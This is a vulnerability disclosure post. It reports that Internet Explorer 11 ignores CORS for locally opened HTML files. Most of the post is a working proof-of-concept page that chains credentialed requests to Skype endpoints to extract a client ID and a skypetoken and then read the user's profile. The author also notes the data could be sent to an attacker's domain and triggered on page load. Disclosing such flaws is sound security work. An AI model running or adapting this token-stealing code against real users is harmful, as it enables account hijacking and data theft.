IE11 is not following CORS specification for local files like Chrome
and Firefox.
I've contacted Microsoft and they say this is not a security issue so
I'm sharing it.
>From my tests IE11 is not following CORS specifications for local
files as supposed to be.
In order to prove I've created a malicious html file with the content below.
<html>
<script>
function createCORSRequest(method, url) {
var xhr = new XMLHttpRequest();
if ("withCredentials" in xhr) {
xhr.open(method, url, true);
} else if (typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open(method, url);
} else {
xhr = null;
}
return xhr;
}
function getClientID(text) {
return text.match('client_id:"([^"]*)",redirect_uri')[1];
}
function getToken(text) {
return text.match('<input type="hidden" name="skypetoken"
value="([^"]*)"/>')[1];
}
function makeCorsRequest() {
var url0 = 'https://s4w.cdn.skype.com/0-224-0/js/index.js';
var xhr0 = createCORSRequest('GET', url0 );
if (!xhr0) {
alert('CORS not supported');
return;
}
xhr0.withCredentials = true;
xhr0.onload = function() {
var text0 = xhr0.responseText;
var clientid = getClientID(text0);
alert('Client ID: ' + clientid);
var url1 = 'https://login.skype.com/login?client_id='+clientid+'&redirect_uri=https%3A%2F%2Fweb.skype.com%2F%3Fintcmp%3Daccountweb-_-uktrybeta';
var xhr1 = createCORSRequest('GET', url1);
if (!xhr1) {
alert('CORS not supported');
return;
}
xhr1.withCredentials = true;
xhr1.onload = function() {
var text1 = xhr1.responseText;
var token = getToken(text1);
alert('Skype Token: ' + token);
var url2 = 'https://api.skype.com/users/self/profile';
var xhr2 = createCORSRequest('GET', url2);
if (!xhr2) {
alert('CORS not supported');
return;
}
xhr2.withCredentials = true;
xhr2.setRequestHeader("X-Skypetoken", token);
xhr2.onload = function() {
var text2 = xhr2.responseText;
alert('User Profile: ' + text2);
};
xhr2.onerror = function() {
alert('Woops, there was an error making the request.');
};
xhr2.send();
};
xhr1.onerror = function() {
alert('Woops, there was an error making the request.');
};
xhr1.send();
};
xhr0.onerror = function() {
alert('Woops, there was an error making the request.');
};
xhr0.send();
}
</script>
<body>
<button onclick="makeCorsRequest()">Click me</button>
</body>
</html>
The file above will be able to get an skype token and perform get on
the user profile. Instead of using alert() function I could send this
information to a domain that I have control.
Of course the victim needs to open the file from his local drive or
maybe another application can open an IE instance.
If the user is logged on a Microsoft account and open the html file
with the content above with onload function instead of onclick I'd be
able to get his profile data.
This is a simple scenario. An attacker would be able to get any data
from any domain that do not require a unique ID (e.g. CSRF token)
which the attacker doesn't have and is unable to get.
If you do the same test on Chrome or Firefox the browser will follow
CORS specification and block the response content since no CORS
headers is present in the response.
I tested on IE11 running on Win7SP1 with all security patches and it
worked. On Win10 didn't work. I didn't test in any server with CORS
enabled.
If you think in another malicious scenario please let me know.
Thanks!
Ricardo Iramar